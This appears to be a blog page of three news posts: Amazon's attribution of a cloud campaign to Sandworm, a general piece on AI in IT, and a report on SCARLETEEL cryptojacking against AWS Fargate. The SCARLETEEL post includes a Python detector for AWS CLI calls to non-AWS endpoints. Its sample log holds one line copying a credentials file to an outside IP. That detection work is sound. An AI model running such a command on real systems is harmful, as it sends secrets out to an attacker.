
Amazon Links Five-Year Cloud Cyber Campaign to Russia’s Sandworm Group

 

Amazon has disclosed a hacking campaign that has been going on for a long time and that targeted customers who use cloud services in multiple countries. Amazon says that a group called Sandworm, which is linked to Russian intelligence, is behind it. Amazon's threat intelligence team found that the hacking has been happening for five years. The hackers were looking for weaknesses in how customers set up their devices rather than trying to find problems with the software, and they exploited these weaknesses to get into customer environments.

The hackers were targeting the cloud-connected environments of customers who use Amazon's cloud services, and Amazon says that Sandworm is responsible for this activity. The people at Amazon looked at this problem in December. Amazon's chief information security officer, CJ Moses, said that this is a change in how some groups try to get into important systems: these groups are not trying to get in by exploiting software that has not been updated.

Instead, they are looking at devices that are connected to the cloud and are not set up correctly, and they use these devices to get into the organizations they are trying to attack. CJ Moses and the people at Amazon think that this is a way that state-sponsored actors are trying to get into critical infrastructure.

The cyberattacks were different from others. The systems that were compromised were not old or missing security updates. Instead, the attackers found problems with the equipment that connects networks, such as gateways and devices that sit at the edge of networks, which had been set up incorrectly by the customers who used them. This equipment usually sits between a company's networks and the cloud services it uses outside.

So it gave the attackers a way to get into the rest of the system without needing to find brand-new weaknesses or use very complicated malicious software at the start. The attackers used these edge devices as a kind of bridge into the system, which was possible because the customers had not set the devices up correctly. The compromised systems, including the routing equipment and gateways, were the key to the attack.

Once the attackers got into the system, they were able to get important information such as passwords, and then move to different cloud services and the internal system. Amazon looked at this and thinks that the attackers were able to hide what they were doing by making it look like normal activity on the network, which made it harder to catch them. The attackers used passwords and normal paths on the network, so they did not trip any alarms. Security staff did not notice them because they were not doing anything that seemed out of the ordinary.

The Sandworm activity was seen multiple times over a few years, with signs of it going back to at least 2021. The people behind this campaign were going after targets all around the world, and they were especially interested in organizations that do important work, such as those that deal with critical infrastructure. Amazon found that they were really focused on energy companies in North America and Europe. This shows that the Sandworm activity was a thoughtful and planned operation, which is what makes it so serious.

Security specialists who looked at the results think this is part of a bigger pattern among advanced threat actors: taking advantage of mistakes in how things are set up rather than looking for things that need to be updated. As organizations start to use hybrid and cloud-based systems, this is becoming a bigger problem. Even people who are very good at IT can miss mistakes in how things are set up, and this can leave them open to attacks all the time. Security specialists and these advanced threat actors both know that these mistakes can be exploited without setting off warnings that something is wrong.

Advanced threat actors are using these mistakes to get in. Amazon's disclosure is a warning that cloud security is not just about doing the usual updates. Companies that use cloud and hybrid environments for work need to do more: make sure everything is set up correctly, always check for problems with devices that are connected to the internet, and limit who can get into the system. These things are very important for security. Amazon's cloud security is an example of this. Cloud security requires a lot of work to keep it safe.

In a separate disclosure, Amazon also acknowledged detecting attempts by North Korean operators to conduct large-scale cyber activity, though this was unrelated to the Sandworm campaign. The company later clarified that the Russian-linked operation targeted customer-managed devices hosted on AWS rather than Amazon’s own infrastructure, and that the activity represented sustained targeting over several years rather than uninterrupted access.

AI's Swift Impact on the IT Industry

The integration of Artificial Intelligence (AI) in the Information Technology (IT) industry is poised to bring about rapid and profound changes. As businesses seek to stay ahead in an increasingly competitive landscape, the adoption of AI technologies promises to revolutionize how IT operations are managed and drive innovation at an unprecedented pace.

According to a recent report by ZDNet, the impact of AI on the IT industry is set to be both swift and far-reaching. The article highlights how AI-powered solutions are automating tasks that were once time-consuming and labour-intensive. This shift allows IT professionals to focus on higher-level strategic initiatives, enhancing productivity and efficiency across the board.

IDC, a renowned market intelligence firm, supports this view in its latest research. The report underscores that AI technologies are becoming indispensable tools for businesses seeking to streamline operations and gain a competitive edge. IDC predicts a significant surge in AI adoption across various sectors, underlining the transformative potential of this technology.

Furthermore, the 2023 Enterprise IoT and OT Threat Report by Zscaler ThreatLabz sheds light on the crucial role AI plays in securing the expanding landscape of enterprise IoT and OT devices. As the Internet of Things continues to grow, so do the associated security risks. AI-powered threat detection and response systems are proving to be instrumental in safeguarding networks against evolving cyber threats.

The convergence of AI and IT is driving innovation across domains such as cloud computing, cybersecurity, and data analytics. Cloud platforms are leveraging AI to optimize resource allocation and enhance performance, while cybersecurity solutions are using AI to detect and respond to threats in real-time.

Organizational structures are changing as a result of AI's incorporation into the IT sector. Organizations are reaching new heights in terms of productivity, security, and innovation thanks to the quick adoption of AI technology. Enterprises adopting AI will have an advantage in navigating the opportunities and difficulties presented by the changing IT ecosystem in the future. The revolutionary potential of artificial intelligence is undoubtedly linked to the future of IT.

SCARLETEEL Hackers Target AWS Fargate in Latest Cryptojacking Campaign

 

An ongoing, sophisticated attack campaign known as SCARLETEEL continues to target cloud environments, with threat actors currently focusing on Amazon Web Services (AWS) Fargate.

According to a new report from Sysdig security researcher Alessandro Brucato, "Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture."

The cybersecurity firm originally revealed SCARLETEEL in February 2023, describing a complex attack chain that resulted in the theft of confidential information from AWS infrastructure and the installation of bitcoin miners to illicitly profit from the resources of the compromised systems.

Cado Security's follow-up investigation revealed possible connections to the well-known cryptojacking outfit TeamTNT. However, Sysdig told The Hacker News that it "could be someone copying their methodology and attack patterns."

The threat actor's latest activity continues its pattern of targeting AWS accounts by exploiting vulnerable public-facing web apps in order to achieve persistence, steal intellectual property, and potentially earn $4,000 per day using bitcoin miners.

According to Brucato, "The actor discovered and exploited a flaw in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then use it however they wanted."

The adversary starts by exploiting JupyterLab notebook containers that are deployed in a Kubernetes cluster. Using this initial foothold, the adversary conducts reconnaissance on the target network and gathers AWS credentials to gain further access to the victim's environment.

Next comes the installation of the AWS command-line tool and the Pacu exploitation framework for later exploitation. The attack is notable for using a variety of shell scripts to retrieve AWS credentials, some of which target AWS Fargate compute engine instances.

"The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol," Brucato said, adding the SCARLETEEL actors used stealthy techniques to ensure that data exfiltration events are not captured in CloudTrail logs.

Other actions taken by the attacker include the use of a DDoS botnet malware known as Pandora and the Kubernetes penetration testing tool Peirates, all of which point to continued efforts on the part of the actor to monetize the host.
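Requests the AWS client sends to an S3-compatible system outside AWS never reach an AWS API, so host-side process telemetry is the place to look for them. The following is an added detection sketch, not code from Sysdig's report or from this post; it assumes the endpoint is passed with the AWS CLI's `--endpoint-url` option and that process-execution logs are available in the constructed `<timestamp> <node> <user> <command line>` format shown.

```python
import shlex
from urllib.parse import urlparse

# Suffixes treated as AWS-operated endpoints (assumption; extend for your partitions).
AWS_SUFFIXES = (".amazonaws.com", ".amazonaws.com.cn")

# Constructed sample exec-log lines, not taken from any real incident.
SAMPLE_LOG = """\
2023-07-01T10:02:11Z node-a jovyan aws s3 ls s3://team-bucket
2023-07-01T10:05:40Z node-a jovyan aws s3 sync /home/jovyan s3://backup --endpoint-url https://s3.storage.example.net
2023-07-01T10:06:02Z node-b app aws --endpoint-url=https://s3.eu-west-1.amazonaws.com s3 cp a.txt s3://b/a.txt
2023-07-01T10:09:55Z node-b app /usr/local/bin/aws s3 cp creds.txt s3://drop/ --endpoint-url http://203.0.113.7:9000
"""

def endpoint_of(argv):
    """Return the --endpoint-url value from an argv list, or None if absent."""
    for i, arg in enumerate(argv):
        if arg.startswith("--endpoint-url="):
            return arg.split("=", 1)[1]
        if arg == "--endpoint-url" and i + 1 < len(argv):
            return argv[i + 1]
    return None

def is_aws_host(host):
    """True only when the host name ends in a known AWS endpoint suffix."""
    host = (host or "").lower().rstrip(".")
    return any(host.endswith(suffix) for suffix in AWS_SUFFIXES)

def find_external_endpoints(log_text):
    """Flag AWS CLI executions whose endpoint override points outside AWS."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        ts, node, user, cmdline = parts
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            continue  # unbalanced quoting: skip rather than guess
        if not argv or argv[0].rsplit("/", 1)[-1] != "aws":
            continue
        url = endpoint_of(argv)
        if url is None:
            continue  # default AWS endpoint; the API call is visible to CloudTrail
        target = urlparse(url).hostname  # None if the URL has no scheme
        if not is_aws_host(target):
            findings.append({"time": ts, "node": node, "user": user,
                             "endpoint_host": target, "endpoint_url": url})
    return findings
```

Findings here are leads to triage, since legitimate tooling also overrides the endpoint for on-premises S3-compatible storage and local test stacks.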

"The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes," Brucato said. 

"Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via crypto mining, but [...] intellectual property is still a priority."